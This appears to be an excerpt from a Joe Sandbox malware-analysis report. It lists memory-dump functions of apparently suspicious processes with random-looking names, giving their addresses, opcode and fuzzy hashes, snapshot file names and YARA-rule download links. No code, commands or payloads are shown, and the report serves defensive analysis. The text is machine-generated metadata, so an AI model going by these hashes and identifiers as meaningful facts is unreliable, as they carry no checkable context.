                                        • Instruction ID: c81f57f045632199774b58e8f9caa8b909a510c068cdd6c4e5452a0a8bc894a7
                                        • Opcode Fuzzy Hash: e018a24ce75056e61c525e414ef075b560f0d64e2393c3364468917f834b17d9
                                        • Instruction Fuzzy Hash: 46F0A43594D7C69FD3038770C8115E43FB4AF43224B9800F6D445CB0A3C91D5E4AC3A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F10FD Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bb8e3ee14450b7aec74bb7bf5942f18f5d8cedbb24ab1c0b7e958056a8289e8
                                        • Instruction ID: eb96d3e0c2347771858199ac5b72361eceb20063d171bdc62eb64332c55e14dc
                                        • Opcode Fuzzy Hash: 8bb8e3ee14450b7aec74bb7bf5942f18f5d8cedbb24ab1c0b7e958056a8289e8
                                        • Instruction Fuzzy Hash: 51F0E53194CA854FCB99E629C495DA13BA1EF6530074A00DAD445CB6F7EA65EC88C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F162E Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8fd47cc53f23cae10ab41ed58f3b3e9617465295e598924af3dfb0d4ab38ad51
                                        • Instruction ID: 4a714afc35f094acb9bf6f65cc3ab29ef1e8d186fc023614d6a5677d3dcac35f
                                        • Opcode Fuzzy Hash: 8fd47cc53f23cae10ab41ed58f3b3e9617465295e598924af3dfb0d4ab38ad51
                                        • Instruction Fuzzy Hash: 92F0DA3490895DCFCF98EF88C494BA8B7B1FB68301F1040AAC00EE7294CA35A981CF10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F1917 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82addef56557cd51093c0171f41d52e41d725fe8bdda200cfd20f62dc0b8672a
                                        • Instruction ID: 7133552aa982c73465427145771b5857a713beba24f1e7fdc3bfda5ce58e2889
                                        • Opcode Fuzzy Hash: 82addef56557cd51093c0171f41d52e41d725fe8bdda200cfd20f62dc0b8672a
                                        • Instruction Fuzzy Hash: A8F0A531A1485C8FCF98EA18D894BA8B3B1EBA9301F144199D00EE3261CA75ADC5CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F10DD Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3bbe2231b49e3069877ed2d9d4a5a5ed20953191388b71d31ce564052f6d2c7b
                                        • Instruction ID: f3be1339bf142912a036d8b6f8e8f7bc716c0fc1f3b490afb55d66689e072075
                                        • Opcode Fuzzy Hash: 3bbe2231b49e3069877ed2d9d4a5a5ed20953191388b71d31ce564052f6d2c7b
                                        • Instruction Fuzzy Hash: 90E0EC4AE5CCAB4AF7A6615AA0152FC52C1AF9E670BD501F6D40DC72E2DC492E821289
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F1627 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ffad8dd118e9783e4e08265bd69bb204dbe10c0b24e26549b9fea5e1a745463
                                        • Instruction ID: 74368040baa9ad5cef7120f6b51c3d3f14b1a2f246f4a02ccea6d42d273208a6
                                        • Opcode Fuzzy Hash: 9ffad8dd118e9783e4e08265bd69bb204dbe10c0b24e26549b9fea5e1a745463
                                        • Instruction Fuzzy Hash: DDF0AC74908D5DCFCF99DF88C494AA877B1FB55304F6441A9C00EE7294CA35AD81CF10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F27FF Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7df4dda7c938c3747093341bd5053c2a58e167f55cf9ec7b1d8dc44a9ca15bfc
                                        • Instruction ID: db9b0ae6101319ccba9b7ed3cbe95a20a0652d1b615f2910f402e1b7678f8e6c
                                        • Opcode Fuzzy Hash: 7df4dda7c938c3747093341bd5053c2a58e167f55cf9ec7b1d8dc44a9ca15bfc
                                        • Instruction Fuzzy Hash: 89E0EC30708C0C4FAB88FA2CC45DEA433D2EBA871275500A5E009C73B6DE28ED428741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F37DE Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2882cc54710dab0049f85c5678b58c0cbbccd1df93d383a48419f952d4f1f799
                                        • Instruction ID: 5407b09e92e967e8ee0af7f0750ff27a2fdc6923ad9444feafcf192de6c2ecf0
                                        • Opcode Fuzzy Hash: 2882cc54710dab0049f85c5678b58c0cbbccd1df93d383a48419f952d4f1f799
                                        • Instruction Fuzzy Hash: 84D05E3271C8184FEB48FB18E445AA5B3D1EBA533171545A6D40AC71B5EE2AE892C781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F37D2 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ed58473d83036b58c52e7e8a68ed9bc2912a7b5afed66db08bdd30e4bbf846d
                                        • Instruction ID: e01b21f61e18499ae062c9c0650b3a2a7741c7db4003d156b7c6ab02ae9505a4
                                        • Opcode Fuzzy Hash: 5ed58473d83036b58c52e7e8a68ed9bc2912a7b5afed66db08bdd30e4bbf846d
                                        • Instruction Fuzzy Hash: 49D0A76155F5550EE3157674B80B4F7FBC0EE020313450AFFD402CF072D44648418344
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F2DAB Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1e9c47e4f2580baba025e05191cf01ba91cdc085e3ddd41ba7b16c6abb9759c
                                        • Instruction ID: 6bd9772d5326e1533f70c5c1996b1211b3cd4b2f1f181c750ebfd0400b80bff2
                                        • Opcode Fuzzy Hash: d1e9c47e4f2580baba025e05191cf01ba91cdc085e3ddd41ba7b16c6abb9759c
                                        • Instruction Fuzzy Hash: A7D09E31718C0C8FDF85FB18C454E6573E1EBA83057544065900DC72A5DE34ED85CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F2D8A Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9caeaf6806df64e8205e1479ce7aa48f9ba045d7d6e5c980494d9e9c52dc68c9
                                        • Instruction ID: 1401ed0cde0a6129ae64daf35ff2ea5fdb6b887c078f340a12827ba5a9ae0733
                                        • Opcode Fuzzy Hash: 9caeaf6806df64e8205e1479ce7aa48f9ba045d7d6e5c980494d9e9c52dc68c9
                                        • Instruction Fuzzy Hash: A3C09B1172DE0D1F5194A55C3C9537D63C2D7DC4547C4177B951EC335ADC545C470391
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFE188F10C3 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004E.00000002.4650467877.00007FFE188F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE188F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_78_2_7ffe188f0000_fgfdgd.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction ID: 8f00342d5476b11c90077690ee78e8bb4575b8de0a33011755740590c8362860
                                        • Opcode Fuzzy Hash: 10da47a97ca51b5305dfae787c99d587f4d1e945cd88ee6cf5adbfbb597f2423
                                        • Instruction Fuzzy Hash: D7C08019EDDD174DFB955095E0020FC7250DF4E330BC420B9C00FC5192DC8D1D810645
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Function 00007FF646941140 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000004F.00000002.4646613120.00007FF646941000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF646940000, based on PE: true
                                        • Associated: 0000004F.00000002.4646579178.00007FF646940000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000004F.00000002.4646643897.00007FF646947000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000004F.00000002.4646676412.00007FF646949000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000004F.00000002.4646724436.00007FF64694A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000004F.00000002.4647282829.00007FF646BB7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000004F.00000002.4647358602.00007FF646BBD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000004F.00000002.4647498926.00007FF646E33000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000004F.00000002.4647540478.00007FF646E35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_79_2_7ff646940000_ghghghg.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction ID: 0a7595e26375c1aa92b53ff09b2836b060a6c811ef27f7fa3c40dcea8b978529
                                        • Opcode Fuzzy Hash: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                        • Instruction Fuzzy Hash: 8EB0922190D20A85E2003B01984126862606B18740F400420C41C86353CEEF54404B10
                                        Uniqueness

                                        Uniqueness Score: -1.00%